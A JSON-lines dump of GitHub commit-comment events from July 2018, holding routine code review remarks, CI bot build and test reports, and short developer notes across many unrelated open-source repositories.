{"id":"7996348523","type":"CommitCommentEvent","actor":{"login":"saproj"},"repo":{"name":"saproj/Stockfish"},"payload":{"comment":{"id":29782542,"position":null,"line":null,"path":null,"commit_id":"1629ceb5e6446db5ccc34966d25ae18434a9d417","created_at":"2018-07-20T17:47:22Z","updated_at":"2018-07-20T17:47:22Z","author_association":"OWNER","body":"I did not know About the previous test. Thanks for telling.\r\n\r\nI ran 5K games locally and got +2 ELO points, so I decided to take a risk by testing here."}},"created_at":"2018-07-20T17:47:22Z"}
{"id":"7996348562","type":"CommitCommentEvent","actor":{"login":"dolphineye"},"repo":{"name":"mosra/magnum"},"payload":{"comment":{"id":29782543,"position":25,"line":80,"path":"src/Magnum/Text/DistanceFieldGlyphCache.cpp","commit_id":"7bf56e9fb07725b407526bd1aed192346a164559","created_at":"2018-07-20T17:47:23Z","updated_at":"2018-07-20T17:47:23Z","author_association":"NONE","body":"You have a typo here for `ImageVIew2D` ;)"}},"created_at":"2018-07-20T17:47:23Z"}
{"id":"7996359415","type":"CommitCommentEvent","actor":{"login":"saikrishnasgit"},"repo":{"name":"saikrishnasgit/Azure-Attachment-Management"},"payload":{"comment":{"id":29782557,"position":null,"line":null,"path":null,"commit_id":"5fde6bfb0f58e4724db7c2eeb30053985f6b8191","created_at":"2018-07-20T17:49:48Z","updated_at":"2018-07-20T17:49:48Z","author_association":"OWNER","body":"removing this...."}},"created_at":"2018-07-20T17:49:48Z"}
{"id":"7996360050","type":"CommitCommentEvent","actor":{"login":"yangm97"},"repo":{"name":"group-butler/GroupButler"},"payload":{"comment":{"id":29782559,"position":null,"line":null,"path":null,"commit_id":"fc12590b0936dbae4072d2813680f114e4894da0","created_at":"2018-07-20T17:49:57Z","updated_at":"2018-07-20T17:49:57Z","author_association":"MEMBER","body":"Looks like just typos were fixed."}},"created_at":"2018-07-20T17:49:57Z"}
{"id":"7996360628","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29782561,"position":21,"line":21,"path":"v5/okapi/tutorials/concepts/factories.rst","commit_id":"433b936353946695a78b4b997a57a253560ffa00","created_at":"2018-07-20T17:50:06Z","updated_at":"2018-07-20T17:50:06Z","author_association":"COLLABORATOR","body":"I think you meant to call the factory here but called a constructor with the factory method's arguments instead."}},"created_at":"2018-07-20T17:50:06Z"}
{"id":"7996363401","type":"CommitCommentEvent","actor":{"login":"Octogonapus"},"repo":{"name":"purduesigbots/pros-docs"},"payload":{"comment":{"id":29782563,"position":36,"line":36,"path":"v5/okapi/tutorials/concepts/factories.rst","commit_id":"433b936353946695a78b4b997a57a253560ffa00","created_at":"2018-07-20T17:50:38Z","updated_at":"2018-07-20T17:50:38Z","author_association":"COLLABORATOR","body":"FYI, there is a `TimeUtilFactory`."}},"created_at":"2018-07-20T17:50:38Z"}
{"id":"7996365270","type":"CommitCommentEvent","actor":{"login":"JonathanHaas"},"repo":{"name":"JonathanHaas/penn-today-ci"},"payload":{"comment":{"id":29782566,"position":null,"line":null,"path":null,"commit_id":"92b0982f36606122f6750c557cfe9a4e033dffee","created_at":"2018-07-20T17:51:05Z","updated_at":"2018-07-20T17:51:05Z","author_association":"OWNER","body":"Created multidev environment [penn-today-ci#pr-184](https://dashboard.pantheon.io/sites/4efb815f-6135-4a6f-97a8-9a974be0bd7a#pr-184).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://pr-184-penn-today-ci.pantheonsite.io/)"}},"created_at":"2018-07-20T17:51:05Z"}
{"id":"7996367600","type":"CommitCommentEvent","actor":{"login":"CarterEllsworth"},"repo":{"name":"keon/deep-q-learning"},"payload":{"comment":{"id":29782572,"position":null,"line":null,"path":null,"commit_id":"7f8e7f755663089104e726664d2879c7a266adf3","created_at":"2018-07-20T17:51:36Z","updated_at":"2018-07-20T17:51:36Z","author_association":"NONE","body":"Why was this if statement moved into the timestep loop? Does this make the `minibatch = random.sample(self.memory, batch_size)` part necessary?"}},"created_at":"2018-07-20T17:51:36Z"}
{"id":"7996371991","type":"CommitCommentEvent","actor":{"login":"xamarin-release-manager"},"repo":{"name":"xamarin/xamarin-macios"},"payload":{"comment":{"id":29782584,"position":null,"line":null,"path":null,"commit_id":"1f3ec64601330cd19fff01840411271ab4fe9f9b","created_at":"2018-07-20T17:52:32Z","updated_at":"2018-07-20T17:52:32Z","author_association":"COLLABORATOR","body":"🔥 [Jenkins job](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/91/display/redirect) (on internal Jenkins) failed in stage 'Test run' 🔥 : hudson.AbortException: script returned exit code 2\n\n✅ [Build succeeded](http://xamarin-jenkins.guest.corp.microsoft.com:8080/job/macios/job/xcode10/91//console)\n✅ [API Diff (from stable)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1f3ec64601330cd19fff01840411271ab4fe9f9b/91/jenkins-results/api-diff/index.html)\n✅ [API Diff (from PR only)](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1f3ec64601330cd19fff01840411271ab4fe9f9b/91/jenkins-results/apicomparison/index.html) (please review changes)\n✅ [Generator Diff](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1f3ec64601330cd19fff01840411271ab4fe9f9b/91/jenkins-results/generator-diff/index.html) (only version changes)\n🔥 [Test run failed](http://xamarin-storage/jenkins/xamarin-macios/xcode10/1f3ec64601330cd19fff01840411271ab4fe9f9b/91/jenkins-results/tests/index.html) 🔥\n\n# Test results\n\n1 tests failed, 160 tests passed.\n\n## Failed tests\n\n * apitest/Mac Unified: Failed (Test run failed.)\n"}},"created_at":"2018-07-20T17:52:32Z"}
{"id":"7996373559","type":"CommitCommentEvent","actor":{"login":"jflores353"},"repo":{"name":"AustinCodingAcademy/web-workbook"},"payload":{"comment":{"id":29782588,"position":null,"line":null,"path":null,"commit_id":"c99b469d0f72d99fd0485ea3f26397821bdd2a1e","created_at":"2018-07-20T17:52:51Z","updated_at":"2018-07-20T17:52:51Z","author_association":"NONE","body":"Message of Hello World"}},"created_at":"2018-07-20T17:52:51Z"}
{"id":"7996375601","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29782592,"position":31,"line":99,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-filters/xwiki-platform-notifications-filters-api/src/main/java/org/xwiki/notifications/filters/internal/scope/ScopeNotificationFilterExpressionGenerator.java","commit_id":"89bf7ca9aae77cd6080989385aae6d47511dc164","created_at":"2018-07-20T17:53:16Z","updated_at":"2018-07-20T17:53:16Z","author_association":"MEMBER","body":"NPE if topNode is null"}},"created_at":"2018-07-20T17:53:16Z"}
{"id":"7996376110","type":"CommitCommentEvent","actor":{"login":"gdelhumeau"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29782594,"position":37,"line":105,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-filters/xwiki-platform-notifications-filters-api/src/main/java/org/xwiki/notifications/filters/internal/scope/ScopeNotificationFilterExpressionGenerator.java","commit_id":"89bf7ca9aae77cd6080989385aae6d47511dc164","created_at":"2018-07-20T17:53:22Z","updated_at":"2018-07-20T17:53:22Z","author_association":"MEMBER","body":"NPE if topNode is null"}},"created_at":"2018-07-20T17:53:22Z"}
{"id":"7996377878","type":"CommitCommentEvent","actor":{"login":"cfpp2p"},"repo":{"name":"Entware/entware-packages"},"payload":{"comment":{"id":29782596,"position":1,"line":1,"path":"net/transmission/patches/500-script-torrent-added.patch","commit_id":"53ca44d2070f6032b26516344e8ad556310ad4f9","created_at":"2018-07-20T17:53:43Z","updated_at":"2018-07-20T17:53:43Z","author_association":"NONE","body":"> This is patch was taken from https://trac.transmissionbt.com/attachment/ticket/5586/libtransmission-scriptadded-torrent-and-magnet.patch\r\n\r\n_500-script-torrent-added.patch_\r\n\r\n@The-BB @ryzhovau @zyxmon\r\n\r\nIf we got to  usage https://github.com/transmission/transmission **master** branch an updated patch is necessitated.\r\n\r\nhttps://github.com/transmission/transmission/issues/667#issuecomment-406663697\r\nhttps://github.com/cfpp2p/transmission/commit/e4f9be608f1b0067499f41a16e65857fabe85270.patch"}},"created_at":"2018-07-20T17:53:43Z"}
{"id":"7996379797","type":"CommitCommentEvent","actor":{"login":"vmassol"},"repo":{"name":"xwiki/xwiki-platform"},"payload":{"comment":{"id":29782599,"position":31,"line":99,"path":"xwiki-platform-core/xwiki-platform-notifications/xwiki-platform-notifications-filters/xwiki-platform-notifications-filters-api/src/main/java/org/xwiki/notifications/filters/internal/scope/ScopeNotificationFilterExpressionGenerator.java","commit_id":"89bf7ca9aae77cd6080989385aae6d47511dc164","created_at":"2018-07-20T17:54:09Z","updated_at":"2018-07-20T17:54:09Z","author_association":"MEMBER","body":"doing your own code review? :)"}},"created_at":"2018-07-20T17:54:09Z"}
{"id":"7996381781","type":"CommitCommentEvent","actor":{"login":"Mizux"},"repo":{"name":"google/or-tools"},"payload":{"comment":{"id":29782606,"position":4,"line":539,"path":"makefiles/Makefile.python.mk","commit_id":"c447ce71d6faf41afffe1529d2c9006f7e75c292","created_at":"2018-07-20T17:54:34Z","updated_at":"2018-07-20T17:54:34Z","author_association":"COLLABORATOR","body":"auditwheel"}},"created_at":"2018-07-20T17:54:34Z"}
{"id":"7996384636","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782609,"position":null,"line":null,"path":null,"commit_id":"862e1f9ebdca2f278e4d482dc2872ff38ace0cb0","created_at":"2018-07-20T17:55:11Z","updated_at":"2018-07-20T17:55:11Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-851](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-851).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-851-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T17:55:11Z"}
{"id":"7996384887","type":"CommitCommentEvent","actor":{"login":"karanjthakkar"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29782610,"position":5,"line":447,"path":"React/Views/ScrollView/RCTScrollView.m","commit_id":"f96d7ae6486eb245496c0fef07239ae0480e88b6","created_at":"2018-07-20T17:55:14Z","updated_at":"2018-07-20T17:55:14Z","author_association":"CONTRIBUTOR","body":"@PeteTheHeat Is it possible to add the two lines I mentioned inside the else if block you added as well? When we did that, it fixed our issue but I wasn't sure if that would have any unintended side effect because I didn't have much context. \r\n\r\nI know it's an edge case and we fixed it by subclassing UIView and creating a category on it so that RCTView's weren't affected. Just wondering if it merits a fix upstream to better handle so that other folks don't spend time investigating it. 🙂"}},"created_at":"2018-07-20T17:55:14Z"}
{"id":"7996386805","type":"CommitCommentEvent","actor":{"login":"sorentycho"},"repo":{"name":"sorentycho/blackmirror"},"payload":{"comment":{"id":29782617,"position":null,"line":null,"path":null,"commit_id":"d126df826f635b656699331b3e0c352fdc58441a","created_at":"2018-07-20T17:55:39Z","updated_at":"2018-07-20T17:55:39Z","author_association":"OWNER","body":"Actually it was really useful, but I was finding the checks unreliable for some reason (kept having to rm -rf dist). I'm going to try and replace it with something like Watchify soon."}},"created_at":"2018-07-20T17:55:39Z"}
{"id":"7996387800","type":"CommitCommentEvent","actor":{"login":"zhangkanqi"},"repo":{"name":"zhangkanqi/BIAN-CHENG-TI-practice"},"payload":{"comment":{"id":29782620,"position":20,"line":20,"path":"PATB1040和A1093有多少个PAT","commit_id":"4f7f1d035d4e8b54378312c2ab4aa128e7a2cc26","created_at":"2018-07-20T17:55:51Z","updated_at":"2018-07-20T17:55:51Z","author_association":"OWNER","body":"PAT的个数即对每一个A为numt*nump，再、累加"}},"created_at":"2018-07-20T17:55:51Z"}
{"id":"7996388854","type":"CommitCommentEvent","actor":{"login":"Mizux"},"repo":{"name":"google/or-tools"},"payload":{"comment":{"id":29782622,"position":4,"line":170,"path":"makefiles/Makefile.unix.mk","commit_id":"c447ce71d6faf41afffe1529d2c9006f7e75c292","created_at":"2018-07-20T17:56:05Z","updated_at":"2018-07-20T17:56:05Z","author_association":"COLLABORATOR","body":"make a note be able to use the wheel package even without a call to `auditwheel repair`"}},"created_at":"2018-07-20T17:56:05Z"}
{"id":"7996398473","type":"CommitCommentEvent","actor":{"login":"Capri2014"},"repo":{"name":"ApolloAuto/apollo"},"payload":{"comment":{"id":29782698,"position":25,"line":207,"path":"modules/planning/conf/planning_config_navi.pb.txt","commit_id":"0a3c2f1f18e6be3ae4c7cc3dd5f81ab3c1f1b215","created_at":"2018-07-20T17:58:07Z","updated_at":"2018-07-20T17:58:07Z","author_association":"MEMBER","body":"Should this speed limit from relative map?"}},"created_at":"2018-07-20T17:58:07Z"}
{"id":"7996402185","type":"CommitCommentEvent","actor":{"login":"jwiegley"},"repo":{"name":"rycee/home-manager"},"payload":{"comment":{"id":29782707,"position":116,"line":116,"path":"modules/misc/nixpkgs.nix","commit_id":"7417d8e86e9b1bfa47482f29604315f5ec2696bf","created_at":"2018-07-20T17:58:53Z","updated_at":"2018-07-20T17:58:53Z","author_association":"CONTRIBUTOR","body":"It was a git configuration problem on my side. I was pointing at my fork of `home-manager`, not yours! Thanks."}},"created_at":"2018-07-20T17:58:53Z"}
{"id":"7996406886","type":"CommitCommentEvent","actor":{"login":"jpfaw"},"repo":{"name":"jpfaw/Proxy-Re-Encryption"},"payload":{"comment":{"id":29782716,"position":72,"line":77,"path":"proxy.c","commit_id":"d7cda89ba3cc27f0f8a3193434a87056ed48464a","created_at":"2018-07-20T17:59:54Z","updated_at":"2018-07-20T17:59:54Z","author_association":"OWNER","body":"本当にこのパラメータでいいのか検証"}},"created_at":"2018-07-20T17:59:54Z"}
{"id":"7996410567","type":"CommitCommentEvent","actor":{"login":"knocte"},"repo":{"name":"MetacoSA/NBitcoin"},"payload":{"comment":{"id":29782734,"position":5,"line":1156,"path":"NBitcoin/Transaction.cs","commit_id":"6789b7e930e3a66bc1da602c9792b15aff46de8b","created_at":"2018-07-20T18:00:39Z","updated_at":"2018-07-20T18:00:39Z","author_association":"CONTRIBUTOR","body":"why not simply a ctor that receives Network as a parameter?"}},"created_at":"2018-07-20T18:00:39Z"}
{"id":"7996412367","type":"CommitCommentEvent","actor":{"login":"vitorgamer58"},"repo":{"name":"BinkersSoft/exchange.coinz.cloud"},"payload":{"comment":{"id":29782736,"position":null,"line":null,"path":null,"commit_id":"f29624051e4f5924bc3fce939c85827ca3343330","created_at":"2018-07-20T18:01:03Z","updated_at":"2018-07-20T18:01:03Z","author_association":"NONE","body":"Interessante"}},"created_at":"2018-07-20T18:01:03Z"}
{"id":"7996412391","type":"CommitCommentEvent","actor":{"login":"squarenabla"},"repo":{"name":"rwth-i6/returnn"},"payload":{"comment":{"id":29782737,"position":13,"line":4766,"path":"TFNetworkLayer.py","commit_id":"2263e88fe447081fb91e235ed5060a8d12c50f8f","created_at":"2018-07-20T18:01:03Z","updated_at":"2018-07-20T18:01:03Z","author_association":"COLLABORATOR","body":"Yes, they are from the official implementation. "}},"created_at":"2018-07-20T18:01:03Z"}
{"id":"7996412568","type":"CommitCommentEvent","actor":{"login":"MoNTE48"},"repo":{"name":"minetest/minetest"},"payload":{"comment":{"id":29782738,"position":null,"line":null,"path":null,"commit_id":"ea86ecf015cd82d2daa4c0f4a82096402290a5a6","created_at":"2018-07-20T18:01:06Z","updated_at":"2018-07-20T18:01:06Z","author_association":"CONTRIBUTOR","body":"@nerzhul \r\nthis is not correct\r\nPlease, check how right!)\r\nhttps://github.com/MultiCraftProject/MultiCraft/commit/f1ac8c101dfd001c59e5e05b39cc25096ac2db6f"}},"created_at":"2018-07-20T18:01:06Z"}
{"id":"7996416693","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782752,"position":null,"line":null,"path":null,"commit_id":"27d7c3c24ddeae306553ea7dc7565d78f51cd264","created_at":"2018-07-20T18:01:57Z","updated_at":"2018-07-20T18:01:57Z","author_association":"OWNER","body":"удалить"}},"created_at":"2018-07-20T18:01:57Z"}
{"id":"7996417319","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782755,"position":null,"line":null,"path":null,"commit_id":"27d7c3c24ddeae306553ea7dc7565d78f51cd264","created_at":"2018-07-20T18:02:05Z","updated_at":"2018-07-20T18:02:05Z","author_association":"OWNER","body":"удалить"}},"created_at":"2018-07-20T18:02:05Z"}
{"id":"7996419931","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782761,"position":null,"line":null,"path":null,"commit_id":"27d7c3c24ddeae306553ea7dc7565d78f51cd264","created_at":"2018-07-20T18:02:39Z","updated_at":"2018-07-20T18:02:39Z","author_association":"OWNER","body":"удалить"}},"created_at":"2018-07-20T18:02:39Z"}
{"id":"7996424670","type":"CommitCommentEvent","actor":{"login":"adinkwok"},"repo":{"name":"georgexu99/georgexu99.github.io"},"payload":{"comment":{"id":29782772,"position":null,"line":null,"path":null,"commit_id":"f7cc3529dad35d8ce478a95bd328e47d9cdf1fba","created_at":"2018-07-20T18:03:42Z","updated_at":"2018-07-20T18:03:42Z","author_association":"NONE","body":"Go George!"}},"created_at":"2018-07-20T18:03:42Z"}
{"id":"7996429185","type":"CommitCommentEvent","actor":{"login":"armandfardeau"},"repo":{"name":"OpenSourcePolitics/decidim"},"payload":{"comment":{"id":29782784,"position":2,"line":3,"path":"decidim-budgets/lib/decidim/extends/project_extend.rb","commit_id":"b601871ee74c4860c248c3049a7a9f58c2dea669","created_at":"2018-07-20T18:04:40Z","updated_at":"2018-07-20T18:04:40Z","author_association":"NONE","body":"Perfectly clear, however, I check on barcelona version and they don't have this method extended, also this method break the tests. Since the upstream moderation feature is removed, @juliesimon @should we keep this method extended?"}},"created_at":"2018-07-20T18:04:40Z"}
{"id":"7996437046","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782803,"position":null,"line":null,"path":null,"commit_id":"862e1f9ebdca2f278e4d482dc2872ff38ace0cb0","created_at":"2018-07-20T18:06:25Z","updated_at":"2018-07-20T18:06:25Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-852](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-852).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-852-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T18:06:25Z"}
{"id":"7996438071","type":"CommitCommentEvent","actor":{"login":"jpfaw"},"repo":{"name":"jpfaw/Proxy-Re-Encryption"},"payload":{"comment":{"id":29782806,"position":81,"line":78,"path":"proxy.c","commit_id":"d7cda89ba3cc27f0f8a3193434a87056ed48464a","created_at":"2018-07-20T18:06:38Z","updated_at":"2018-07-20T18:06:38Z","author_association":"OWNER","body":"変数名修正"}},"created_at":"2018-07-20T18:06:38Z"}
{"id":"7996438962","type":"CommitCommentEvent","actor":{"login":"MemduhG"},"repo":{"name":"apertium/apertium-uig-tur"},"payload":{"comment":{"id":29782809,"position":5,"line":1234,"path":"apertium-uig-tur.uig-tur.dix","commit_id":"eb68e7196cfc4cf42ee40e5356841e68df755823","created_at":"2018-07-20T18:06:50Z","updated_at":"2018-07-20T18:06:50Z","author_association":"COLLABORATOR","body":"İf this is like kadar/gibi then we could write a transfer rule for it\n\nOn Fri, Jul 20, 2018, 7:26 PM koguzhan <notifications@github.com> wrote:\n\n> misl-i cennet, misl-i setaregan etc. I couldn't think of a Turkish\n> alternative.\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/apertium/apertium-uig-tur/commit/eb68e7196cfc4cf42ee40e5356841e68df755823#commitcomment-29781669>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AFqn2jYgTP0oSetZUYQZ-GMYGVW1M9Ceks5uIgSlgaJpZM4VYNlz>\n> .\n>\n"}},"created_at":"2018-07-20T18:06:50Z"}
{"id":"7996441057","type":"CommitCommentEvent","actor":{"login":"jpfaw"},"repo":{"name":"jpfaw/Proxy-Re-Encryption"},"payload":{"comment":{"id":29782816,"position":160,"line":151,"path":"proxy.c","commit_id":"d7cda89ba3cc27f0f8a3193434a87056ed48464a","created_at":"2018-07-20T18:07:20Z","updated_at":"2018-07-20T18:07:20Z","author_association":"OWNER","body":"g3は名残なので適切な名前に変更"}},"created_at":"2018-07-20T18:07:20Z"}
{"id":"7996444113","type":"CommitCommentEvent","actor":{"login":"jpfaw"},"repo":{"name":"jpfaw/Proxy-Re-Encryption"},"payload":{"comment":{"id":29782822,"position":272,"line":218,"path":"proxy.c","commit_id":"d7cda89ba3cc27f0f8a3193434a87056ed48464a","created_at":"2018-07-20T18:08:04Z","updated_at":"2018-07-20T18:08:04Z","author_association":"OWNER","body":"for文は1つでいい"}},"created_at":"2018-07-20T18:08:04Z"}
{"id":"7996444763","type":"CommitCommentEvent","actor":{"login":"punchout"},"repo":{"name":"punchout/chef-fluency-badge"},"payload":{"comment":{"id":29782824,"position":null,"line":null,"path":null,"commit_id":"842877cf65e2a3c2dfbcf1c87f4809d9d1b11c05","created_at":"2018-07-20T18:08:12Z","updated_at":"2018-07-20T18:08:12Z","author_association":"OWNER","body":"starting over "}},"created_at":"2018-07-20T18:08:12Z"}
{"id":"7996449672","type":"CommitCommentEvent","actor":{"login":"nrel-bot-3"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29782836,"position":null,"line":null,"path":null,"commit_id":"172f7521937dddb366d16cffdaed7cd55e6970e2","created_at":"2018-07-20T18:09:19Z","updated_at":"2018-07-20T18:09:19Z","author_association":"NONE","body":"Correct-merge-mistake-with-initializing-CoilDesWaterDeltaT (rraustad) - x86_64-MacOS-10.9-clang: OK (2925 of 2942 tests passed, 8 test warnings)\n\nMessages:\n\n * 8 tests had: AUD diffs.\n * 17 tests had: Table big diffs.\n * 1 test had: EIO diffs.\n * 1 test had: ERR diffs.\n * 1 test had: ESO big diffs.\n * 1 test had: MTR big diffs.\n\nFailures:\n\n\nregression Test Summary\n * Passed: 606\n * Failed: 17\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-MacOS-10.9-clang.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-172f7521937dddb366d16cffdaed7cd55e6970e2-x86_64-MacOS-10.9-clang.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-99.42%25-yellow.png)</a> \n"}},"created_at":"2018-07-20T18:09:19Z"}
{"id":"7996458392","type":"CommitCommentEvent","actor":{"login":"TatianaKobets"},"repo":{"name":"TatianaKobets/tatianakobets.github.io"},"payload":{"comment":{"id":29782853,"position":null,"line":null,"path":null,"commit_id":"cff5207f728b4df5dc2b52c232ccecb31b824590","created_at":"2018-07-20T18:11:14Z","updated_at":"2018-07-20T18:11:14Z","author_association":"OWNER","body":"del"}},"created_at":"2018-07-20T18:11:14Z"}
{"id":"7996461852","type":"CommitCommentEvent","actor":{"login":"zacharyaanglin"},"repo":{"name":"BurntSushi/nflgame"},"payload":{"comment":{"id":29782862,"position":null,"line":null,"path":null,"commit_id":"c9747ccb597d6c31f61e4002bc4bd9f45a05b064","created_at":"2018-07-20T18:12:00Z","updated_at":"2018-07-20T18:12:00Z","author_association":"NONE","body":"Is there a recommended alternative?"}},"created_at":"2018-07-20T18:12:00Z"}
{"id":"7996464310","type":"CommitCommentEvent","actor":{"login":"PeteTheHeat"},"repo":{"name":"facebook/react-native"},"payload":{"comment":{"id":29782868,"position":5,"line":447,"path":"React/Views/ScrollView/RCTScrollView.m","commit_id":"f96d7ae6486eb245496c0fef07239ae0480e88b6","created_at":"2018-07-20T18:12:33Z","updated_at":"2018-07-20T18:12:33Z","author_association":"CONTRIBUTOR","body":"Those lines won't work. \r\n\r\nI'm using `conformsToProtocol:@protocol(UIScrollViewDelegate)` to assume that the view is a custom FB refresh control. Refresh controls aren't treated the same way as content (which is what those 2 lines will do). Obviously, my assumption was incorrect, because I broke your use case.\r\n\r\nYou are correct, it merits a fix, it could be causing others headaches. What is the typical way for open source to see what problems arose in an upgrade? Is it GitHub issues? If so can you file a quick one mentioning that this broke scrollviews for you, and assign it to me. I'll put out the fix soon."}},"created_at":"2018-07-20T18:12:33Z"}
{"id":"7996471136","type":"CommitCommentEvent","actor":{"login":"IgorMoscow"},"repo":{"name":"rdpeng/ProgrammingAssignment2"},"payload":{"comment":{"id":29782886,"position":null,"line":null,"path":null,"commit_id":"e4eed4153bd237a2dd4532fc3f40ce0e22fd0cb7","created_at":"2018-07-20T18:14:09Z","updated_at":"2018-07-20T18:14:09Z","author_association":"NONE","body":"#this function is meant to cache the reverse matrix\r\n\r\nmakeCacheMatrix <- function(x = matrix()){\r\n  inv<-NULL\r\n  set<-function(y){\r\n    x<<-y\r\n    inv<<-NULL\r\n  }\r\n  get<-function() x\r\n  setInverse<-function(inverse) inv<<- inverse\r\n  getInverse<-function() inv \r\n  list(set = set,\r\n       get = get,\r\n       setInverse = setInverse,\r\n       getInverse = getInverse)\r\n}  \r\n\r\n\r\n#this function does the calculation of the inverse matrix\r\n\r\ncacheSolve<-function(x, ...){\r\n  inv<-x$getInverse()\r\n  if(!is.null(inv)){\r\n    message(\"getting cached data\")\r\n    return(inv)\r\n  }\r\n  mat<-x$get()\r\n  inv<-solve(mat,...)\r\n  x$setInverse(inv)\r\n  inv\r\n}\r\n"}},"created_at":"2018-07-20T18:14:09Z"}
{"id":"7996472135","type":"CommitCommentEvent","actor":{"login":"AllenPickett"},"repo":{"name":"AllenPickett/FID"},"payload":{"comment":{"id":29782891,"position":null,"line":null,"path":null,"commit_id":"7b74988a0df68c7192d33daf1e46de9778e7c7b1","created_at":"2018-07-20T18:14:21Z","updated_at":"2018-07-20T18:14:21Z","author_association":"OWNER","body":"![banner](https://user-images.githubusercontent.com/39315776/43018268-1d1f251a-8c27-11e8-9abe-6a621952df6d.jpg)\r\n"}},"created_at":"2018-07-20T18:14:21Z"}
{"id":"7996484333","type":"CommitCommentEvent","actor":{"login":"josh-chou"},"repo":{"name":"SFDigitalServices/sfgov"},"payload":{"comment":{"id":29782920,"position":null,"line":null,"path":null,"commit_id":"0f595ccfe511236202a955e961a947ba5c476772","created_at":"2018-07-20T18:16:54Z","updated_at":"2018-07-20T18:16:54Z","author_association":"COLLABORATOR","body":"Created multidev environment [sfgov#ci-854](https://dashboard.pantheon.io/sites/91d50373-c4cf-40e4-a646-cb73e16a140c#ci-854).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-854-sfgov.pantheonsite.io/)"}},"created_at":"2018-07-20T18:16:54Z"}
{"id":"7996487224","type":"CommitCommentEvent","actor":{"login":"eswarasai"},"repo":{"name":"MARKETProtocol/MARKET.js"},"payload":{"comment":{"id":29782927,"position":null,"line":null,"path":null,"commit_id":"70e511a19e189bf03cb26d97f3f0e4d285856ad5","created_at":"2018-07-20T18:17:35Z","updated_at":"2018-07-20T18:17:35Z","author_association":"MEMBER","body":"😂 👍 "}},"created_at":"2018-07-20T18:17:35Z"}
{"id":"7996491188","type":"CommitCommentEvent","actor":{"login":"ivowillemsen"},"repo":{"name":"ivowillemsen/b9lab-rps"},"payload":{"comment":{"id":29782937,"position":126,"line":170,"path":"contracts/RockPaperScissors.sol","commit_id":"a6c7ba343527340cbed5541a52fafaf6cfaedf25","created_at":"2018-07-20T18:18:27Z","updated_at":"2018-07-20T18:18:27Z","author_association":"OWNER","body":"When inviting that's not so much of an issue. Later when the inviter will reveal the plaintextMove, it will be detected:"}},"created_at":"2018-07-20T18:18:27Z"}
{"id":"7996494663","type":"CommitCommentEvent","actor":{"login":"KosBeg"},"repo":{"name":"KosBeg/disrusm"},"payload":{"comment":{"id":29782946,"position":null,"line":null,"path":null,"commit_id":"751a9f10f402c274122d10311d1d0bf8e9082f7c","created_at":"2018-07-20T18:19:15Z","updated_at":"2018-07-20T18:19:15Z","author_association":"OWNER","body":"yeah, comparing the speed of my unfinished shi- and zydis is a really bad idea for now.\r\nbut I hope in future when I done it my engine be a worthy opponent for zydis :D\r\n\r\nabout bench repo - I know about it and even starred it before you gave me link.\r\n\r\nand thank you very much for a really fast and powerful x86 && x86_x64 disasm engine! \r\nzydis is really the best one ;)"}},"created_at":"2018-07-20T18:19:15Z"}
{"id":"7996494759","type":"CommitCommentEvent","actor":{"login":"ahigley"},"repo":{"name":"ahigley/A-ruby-text-adventure"},"payload":{"comment":{"id":29782947,"position":1,"line":null,"path":"test","commit_id":"6c680810adb68e84909768af0a685d2849d4cd20","created_at":"2018-07-20T18:19:16Z","updated_at":"2018-07-20T18:19:16Z","author_association":"OWNER","body":"this is the body"}},"created_at":"2018-07-20T18:19:16Z"}
